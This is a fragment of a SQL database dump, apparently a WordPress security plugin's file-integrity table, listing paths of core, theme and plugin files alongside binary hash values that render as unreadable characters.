��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�N�$nw�d�4i�u�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/slider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j���ќ<e^� �P','��ݓ�8D�l����rw���]�9�z�','',0,'?'),('�v%���S�[�̪�Ѿ','wp-includes/ms-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\n����[�|�J/�','�8f�٣���<}.Q��������','',0,'?'),('��~C�>��xh��\r','wp-content/plugins/wp-cerber/assets/flags/bh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tx\n=CS\Z�f��PF|','(���=AEhe�SJ駄�_�Ve2Z�E��&j�','',0,'?'),('���|X%jgu@�CJ�M','wp-includes/js/dist/vendor/react.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('�ւxRa��ǜ�@','wp-includes/css/dist/editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_O7b/��T���m�','_w��^���p�{�,ǣ��{}�:�\0���2�','',0,'?'),('���X\"�-{��$48sx','wp-admin/css/deprecated-media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+�H�h����3','�ؖ)_��6h����1��A\\�_lgK�d�kUX�q','',0,'?'),('��42���i�[�O��','wp-content/plugins/wp-cerber/assets/flags/tf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�``�O��.�˛�','��������r��4�&,lb�Fr~�T<���阈�','',0,'?'),('��Ud��M���S$�l','wp-admin/includes/class-wp-list-table-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�>\r_D\"��Ck��C','\\�;��]\"���(+/��}�˚q5��NS\'�','',0,'?'),('�\0���O��b5o�','wp-content/plugins/wp-cerber/assets/flags/ir.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dV�M�t^,��7�xD','i��֚b5�J��?]����+��H�r8��','',0,'?'),('�\rz��@�_Ð�m�dM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�96�f����;���0','mgc%�i\Zn�A��B�@��wF�z�;�y`\rN','',0,'?'),('�@G��t�eY�\\\'>�O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�]Tg���\Z�!��','�m1�X^��s$� Eh��M���WR�{��^�','',0,'?'),('�O~�LȦ�\"f~|��;','wp-content/themes/twentynineteen/sass/site/header/_site-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_���n.�)�U\\!k�','1,����0��љLv��/\r�>%���\"����','',0,'?'),('�Z��Wt�p�N�h','wp-admin/css/nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��\'�]9?�]g�$','���P�a���̬Vch�;������;l','',0,'?'),('����Ȯr��&x�q�','wp-content/plugins/wp-cerber/assets/flags/fi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ќ0C��e���#��','�r\r=O�֓bt����:ٚU$R?�}�t��','',0,'?'),('��Z ��Og\nW�W�2','wp-includes/js/wp-embed-template.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('��o��8s�P�9b','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicheck.php',0,'�\Z$���m$�,7^�a','�\Z$���m$�,7^�a','��2dٓ�qѾQ0Xb��$�Ƴ5#��z��`','',0,'?'),('�����@��@�j���ޟ','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/text-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|���h�Ѩ�e�t��b','h2���;��C�<\"�!�C���N�=��8��f��','',0,'?'),('���7U6S�DHo8#','wp-content/themes/doctors/core/assets/js/jquery.swipebox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hV�y+qU_Ԑ&nn','�Y��� �Y��i��N�u�h����i���#�','',0,'?'),('��!�h>�iq�8t��n','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('���\\��9�ѕ�F�w�','wp-admin/js/revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��Oez���nUR','�q��:\\��H�-��ƒ�V��i���ԍ�$','',0,'?'),('���%�!ڡG��&�5','wp-content/themes/twentytwenty/assets/css/editor-style-block.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ ,�R��','�j^V�:���M�䌚�0o7Y|R9߀a|��� ','',0,'?'),('�����Ly��RB�9�k','wp-content/plugins/wp-cerber/assets/flags/mh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�\0oէ��3ˠ','�ܰ�\n\0�\'6G�R���ZH-�`��Ș�� ','',0,'?'),('� 7��S�Y�D��`��','wp-content/themes/advance/inc/kirki/assets/images/kirki-logo.svg',0,'t�xz�r��rp�f��4b','t�xz�r��rp�f��4b','{4� �\"- v]�F���*Ş( <�ߔh�É>','',0,'?'),('�/=�+HhE��14�ʆ�','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[QTGfS\"�����','�4���4HGM�;]B���FO��d�ƴ6@�','',0,'?'),('�5�&h�k\Ze�g�~�','wp-content/themes/regina-lite/README.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������M�Dק�N\Z','�6���U� >�5|���y���W� ~-�����+�','',0,'?'),('�GR�������m)','wp-content/plugins/wp-cerber/assets/flags/kg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8]�/E0%�gQյQ�','�3$��f�Rx)��@\\�e.3\Z�Ω�\r`p�Y','',0,'?'),('�W�m,�\'&�o�3\r+','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b��H0|�����wb','���<3�O/���V�/G���{\Z�^�H���.k�6','',0,'?'),('�\\�|�^�������A','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/section-repeater-control.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���_r�S/�;','��P���^�����~�z�hW<h�5�.�','',0,'?'),('�g�]�T�H��1@�<','wp-content/themes/regina-lite/sections/section-news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d��N0�G��}��1<�','rf�=��p��fK���܋KP�S�Wо��','',0,'?'),('�l���M+J��m��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�\'���\'�Q^�o�+^','!3��`DTd�k����3���Z�2�6�}','',0,'?'),('�pu\"�9a�r�;��','wp-content/themes/healthcare/css/prettyPhoto.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4��ya=�#','���\Z@/)L��� HԈ��*�;�|e&ЖX','',0,'?'),('�u������%�(��','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ƣٿc;���z���','��N�J�s�@�3 �:h)�7K�<�\\N�+','',0,'?'),('����N���@�(�3�','wp-includes/ID3/module.audio.mp3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O:B\0�z�6x`B','� ]���� \0On��6B;���\ZZ$� 2ЯSh','',0,'?'),('��h���)UG@�x��v ','wp-admin/edit-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�8���K��PH�>H','��j\r�+Yg��1��S����t2�f��;�','',0,'?'),('��t�z�mTL��M���','wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php',0,'��F�G��)��A0��0','��F�G��)��A0��0','��*�і��2�n���I���br����','',0,'?'),('��X��w��E��','wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�ݜ����_ť;k)M','�6��6Pa����D���@���f6�{��','',0,'?'),('��or�������籽�','wp-content/plugins/wp-cerber/assets/flags/bq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��2]hqu:�T6E�U�','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[DW\01f�!�`ߜ�','����Ld+,\rO�V���UNxea9̽�+O�C1�','',0,'?'),('�\r[�8�)�r�}8e','wp-content/plugins/wp-cerber/assets/flags/sz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']{W���:��(�Բ�','PJU����I\"�,�����uVo��ƞ�dQ*z','',0,'?'),('� Ie�ԩ[G���_�6','wp-includes/js/dist/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�60���6�k�/��','�O}���j�\\Eнe��(BL\Z$�핓1','',0,'?'),('�#�AuI.F��/���','wp-includes/js/wp-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('�@��,�n\\���+k�','wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('�O/�ì�`|g�_\0','wp-includes/Requests/Exception/HTTP/429.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��%|F.àZd����','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�SRý+���UE�s>�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-sortable.php',0,'���[���\nSO2}','���[���\nSO2}','�?��O�e�}�z���dnU��W�C4vl��~','',0,'?'),('�Z��S=�\0����v�H','wp-content/plugins/wp-cerber/assets/flags/er.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�Ք#ӕ��?.O�]��','��\0�D?J1�nd�&�%��6\"ᅃ�.��� ','',0,'?'),('�i�м�UJ���b�','wp-content/themes/regina-lite/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�XA��ߚ�3Q�5h8','Yg?�B̸_�:\\{*��є�x�|��%C\n����','',0,'?'),('�v�FI��2h���n�','wp-content/plugins/wordfence/readme.txt',0,'��R���ݯ6��','��R���ݯ6��','z�O҈|�AL?�n�X>��lKt:%��6','',0,'?'),('�{�1�\"��^���.','wp-includes/class-wp-widget-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ե�ᡵ���|��I� ','(H��e3a�Z]��t\\�����\'�d��p���','',0,'?'),('���&@ѫˣ j\"��','wp-content/themes/doctors/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����wI�MrʣT','��_R��A9g6����?T��0��|��xw��','',0,'?'),('��]+*Z��R��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/admin/components/epsilon-admin-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�;���V�d3',')e���������<�ג��+g���h�c','',0,'?'),('���s��������v ','wp-includes/blocks/social-links/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<{�Vg3B+z�B��','�I�W�}��Ogzˀ ��h��-��wl','',0,'?'),('��s��I�qF�����','wp-admin/includes/class-theme-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\P\0������E�é��','T���V/@cB����Վ�o��0`��f_���','',0,'?'),('���=V;�����N.K','wp-includes/js/wp-list-revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('�����h��١k�','wp-content/plugins/wp-cerber/assets/fb2b.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}d��ΰ��R͵�','Ky�Y �O~�vx�W�� �<3����PZPZ','',0,'?'),('����7OPs�Ωp��W','wp-content/plugins/wp-cerber/assets/multi/multi.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P?�� a��80�$','*}�AB�/�*o%���;���5��k��;�3','',0,'?'),('��\n�ӛIQED ��','wp-includes/class-wp-comment-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���!T0^ę��:�','�Q����M�����b?S��_c%��C1`A\0','',0,'?'),('����\\�M�M�F/�I','wp-includes/Requests/Auth/Basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��x̄� 4U� k!C','.�йh�dBiHɀ�n�s�����\\���O','',0,'?'),('��nξ8n��Pp\\`z','wp-content/themes/twentytwentyone/assets/css/ie-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��Fڭ��G��','?���O//��%�N�W0�㍕�M4\'�3�F���','',0,'?'),('��?�pU�2uR���','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/layouts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L� 3��xa>��E�','���|�GS晱�vɱ�i�/��D �Y�ށ�+','',0,'?'),('��Κ,�Q�a�gl��\Z�','wp-includes/class-smtp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.斚a�q�ݓϠ����','B)HJ����ڐ�R�ps� ���� +\'8k_','',0,'?'),('��s��,��j�j3','wp-content/plugins/wp-cerber/assets/flags/gg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��L\Z��|�=�c��','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0�����ou��̌�','����7/Q���ƐՐw�g:�?��#{s��ɟ�','',0,'?'),('��dA#���*�Źo7','wp-admin/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�$�����a�F','{��f[�����;�\"�h�]]u��3 �_�oQ�\Zu','',0,'?'),('�3=^��7�P�RA','wp-content/plugins/wp-cerber/assets/flags/sr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NT��I`$�x�\"v','�J!�^�α}���ݓ$�R�M~i���c���P','',0,'?'),('��V\ZF��\0���|�','wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('���x�OW\r�����','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�5ڜ���2�l2{�','wp-admin/js/widgets/media-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�ܥ��d|Q�S�n�','��R;T��wh��m^�����䜺��K�L�A','',0,'?'),('�D��!VD+����','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�V��� �9�J�','փ��hbf��#��Ђ��OE��R���9H\r','',0,'?'),('�M�/<�P�ߍ�f.��','wp-includes/js/jquery/ui/effect-bounce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('�T�:\Z����rD�� ','wp-content/themes/twentynineteen/readme.txt',0,'dp�bӧ��g�Z�l�u','dp�bӧ��g�Z�l�u','�D/��(V�sc�q\"c!���nX�@�����$','',0,'?'),('�VT��2e�w�gߋu8','wp-includes/js/jquery/ui/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('�W𓃚�F��GjU�Z','wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\n��+5�����4�','\\Λ;3X]��3��{{8�ҒZ\0�>��\\�&�','',0,'?'),('�v0�\ZwWo��5��@8','wp-content/themes/advance/inc/kirki/autoloader.php',0,'DD)\n�����W�e�','DD)\n�����W�e�','�\nr^�a^�qXA%��V�4)0�6��ZOHS��','',0,'?'),('�z�6��+���PH\r�tU','wp-includes/css/dist/block-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p>F��ő~���K��','fm��e)����$�4�_%��8�R��L��','',0,'?'),('���˥̰MVЗe�A�','wp-admin/js/widgets/media-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3S��-!@|��[�M','���s�n�����U������Bo3�}��+�+','',0,'?'),('��ѝ�q������E','wp-content/themes/healing-touch/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���.Q�<E�H��O��','Eo�<�e*�d�5� J���5\"k�+l_qNF� �','',0,'?'),('���t��(�iltY/','wp-includes/css/dist/list-reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����(����6�','��b1O�������:�DDHR�cj�ѐ�P�\r','',0,'?'),('��Τe;y�[��9�9','wp-includes/js/jquery/ui/checkboxradio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('��\nL0Qod`�\\�;�','wp-content/plugins/wp-cerber/assets/icons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T4�s�bRߺ0�','v �QNԯ�L�|̗E��,@���8By�:Y��','',0,'?'),('��(�e�K��L-�9aV','wp-content/themes/healing-touch/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�ï\"I��\n���','�o�\0Cj���\ZM�;2�D���\r�2 ����','',0,'?'),('��3\"�(z�a�4�8�','wp-includes/images/media/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('��g,s���t��\r�','wp-content/themes/advance/inc/kirki/includes/class-kirki-selective-refresh.php',0,'o\\\"d�[|�\0�Veq�','o\\\"d�[|�\0�Veq�','�C����<ŷ�s@n9P��\n�A$�;�&�L','',0,'?'),('��[\"�T�?=�bd','wp-content/themes/advance/inc/kirki/includes/class-kirki-customize-control.php',0,'~��@S����њ�','~��@S����њ�','�;��\"!��/-���I�_� \n�x� s~�h','',0,'?'),('�\n�\"Y|�v���oE��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2I�li��g���R�w','D�V����]�\\�P���f�y�K�u�a�m��','',0,'?'),('�~Q�ԁŴFp���','wp-includes/class-wp-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kx�om���u�5t�','��8TI�|�|C�!��`vg�#�Q!ɓ{=��','',0,'?'),('�&v�3�j\r��r�^rt�','wp-content/themes/weblog/acmethemes/hooks/masonry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�,g}M��� ���N','�R��K�u�T��Ե��t?���\n2� C�7','',0,'?'),('�2|�MJ�/�͆�^�}','wp-content/plugins/wp-cerber/assets/flags/ao.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\'��cu��fq�','�9&��[��؊�|�&���ʘ�����<��HR','',0,'?'),('�Vr�iW��>.\n����\"','wp-content/themes/skt-toothy/images/icon-gp.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ş�w�b��Pj�`b�','��x�;�m7���7�#�^ӖF�ފ�
','',0,'?'),('�]*e��Sk�c��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/admin/epsilon-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DD� ,�Ʌ`�','�A�W��M��v��N�s6r�2TRʆ7�1�e�','',0,'?'),('�kHm�1��`0ѹ��_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2����sg�5�䃥l','�?*��\0Z:WX̩�k�k\0IM��UT','',0,'?'),('�zݿ�&X❙6���s','wp-admin/css/media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E^?���7��v�+�z=','A�l:d�72[�X1R�w�#��ؤ�p��h5�6X','',0,'?'),('�|�������<��^','wp-content/themes/wp-barrister/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�͒2�%��O�CE>�','�Hs[l�q �5\r(�@��/�<8�mu���','',0,'?'),('��!��y��F��]���','wp-admin/includes/class-wp-ajax-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&L�g=�%cn� }ǣ�','(��`���ĺ�E�ϙ)#��I�jHߠ�&�{','',0,'?'),('����\n ����(z','wp-includes/PHPMailer/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ߡ�M(���','��A+�n7�51�K���i��|Y��m','',0,'?'),('�����z(�d�\'dIt�\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��4?N��Pɴ�_�','ȏ�DEDL]R���d��4�\"�$ A�vǓ�','',0,'?'),('�ٵ\nh��Jx�dv�ԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�ݥ��!��YG�w','!�r�|�n�M�-��Yn6X�p����ʖ','',0,'?'),('�$��Ld�N�B��1','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0;�A�\\\\E�gC�^\\','�P��ˡr�#��bhI.�;��ٵ7�\'콀N','',0,'?'),('��^|J�ʕ\Z%��\"b�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i^e�]�M���@','�~\nf)��Z�����?\"z�I�\\�N乍��','',0,'?'),('��$�T�X�@#��A��','wp-admin/js/widgets/text-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�#)��i�M��}����','\n��^uӟf~LE5A�\0��r23�q6BSk���','',0,'?'),('���2zs�4x�EB','wp-includes/ID3/module.tag.id3v1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IU��.Q�c�g���','�C��BH�9��D�y�;-�K�:LAx�?8\\~� ��','',0,'?'),('�_r#�Eȯ�̪%','wp-content/plugins/wp-cerber/assets/flags/ne.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�`R��$�`}L��\0\"�','h�~w=+^��Q#Wt/�� w�~�j���+','',0,'?'),('�Obc��\" ���|J(','wp-includes/images/smilies/icon_evil.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('�1��WV(2��6����','wp-admin/images/icons32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۬[�m9��J�4�\Z�','D�kC�d��i|a|�����+�\r�x��̌��','',0,'?'),('�2�$3��\"��$47��','wp-content/themes/skt-toothy/images/icon-fb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rjY��_�d�s_\' �S1','T�t,l�?��p�\nh\"*�,���5/WwHb�o\"F','',0,'?'),('�5�u�uȸ��8�P�Һ','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���܊:����嵷Y','&��yZ��e��n��_���&���0�A �5','',0,'?'),('�6��M͓��)̻','wp-includes/blocks/text-columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�ȴ����Y͆ ','�A��-�תe���`�)�\'WS>KXIZ��','',0,'?'),('�=���}�LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�\nXj�\'�;q�{��a�','',0,'?'),('�O�tg�\02�\\�B��','wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�K��a�e�kb\r�5','�^h&^I��nb�ކ�n:*jB�_��3�V+n�','',0,'?'),('�Ym�R�l�X\0���:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�II�ٹ�$V��;�','p�K�-��.,�ZT�!��:-[�������','',0,'?'),('�]숊YT��Xm�+%','wp-includes/js/dist/vendor/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\"��\"M��aM�w�M','O��m��y���6ۆ�x`R0Nh[7\0]�%�ʞ','',0,'?'),('�j��U�U�X\Z��/J/','wp-admin/includes/class-core-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u����� X�9\"QB','Hg�-�9������O�2G����f�#�B���S','',0,'?'),('�|�\\��KY\rQ z#��','wp-content/themes/healthcare/css/font-awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0���{�B�YD�%','���qa#T0��T�n=���8X\n�Bg%L�','',0,'?'),('t�w̾ݏ�\0B�|7','wp-content/themes/healing-touch/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','땬�����\Z<j','o;�Jj�\"6�7�q��-�F�8�zq���a�','',0,'?'),('��̰��O����/#','wp-content/themes/wp-barrister/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%e3���_�p�','����\"[��<y��V��6�XJ��}��z0','',0,'?'),('�gزh/Ḯ�O�N','wp-includes/class-wp-block-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<Aj�Q�~$���~��','��\\)�dw(?o���1�i�n�@�~KU6���Z','',0,'?'),('�1���|�}���dQ','wp-admin/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�\"�\r\r�','x��=��|ˋ{�lbn��;��Ep���r�?','',0,'?'),('�����}S��І��','wp-content/themes/doctors/images/demo/user_2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}����W�ǕE�զ','$<1=Y�d��D������.��r��9�͘�4%','',0,'?'),('��ށ�H��Û�\'O�+','wp-content/plugins/disable-gutenberg/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�N��5\rVX�0�<&','����8~���YgN�$����ݠSG�3Q�','',0,'?'),('��خ��$�>���[V!','wp-content/themes/doctors/core/customizer/help/custom_control_heading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'���2�<g��rYK�','�R�=y��P^a�W�d��]����oZf]�k','',0,'?'),('� 1��А々�S:(','wp-includes/js/thickbox/loadingAnimation.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('��]��ۓl�ӮOa','wp-content/themes/vision-lite/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\' �#\'a*��/','�Ћ��^\0��ITZ�����ʔ�A?��I:[~\'w','',0,'?'),('�w:k@D�i�WQ�','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oI�Ʒk���b','7.ݰ̿���U���L>�\"�TM5�]��>�','',0,'?'),('���\Z�V���տ','wp-content/plugins/wp-cerber/cerber-maintenance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�69SH\nƻ��/��(�','�(c%��vW�S�xEuς><���¶�Ȯ[� 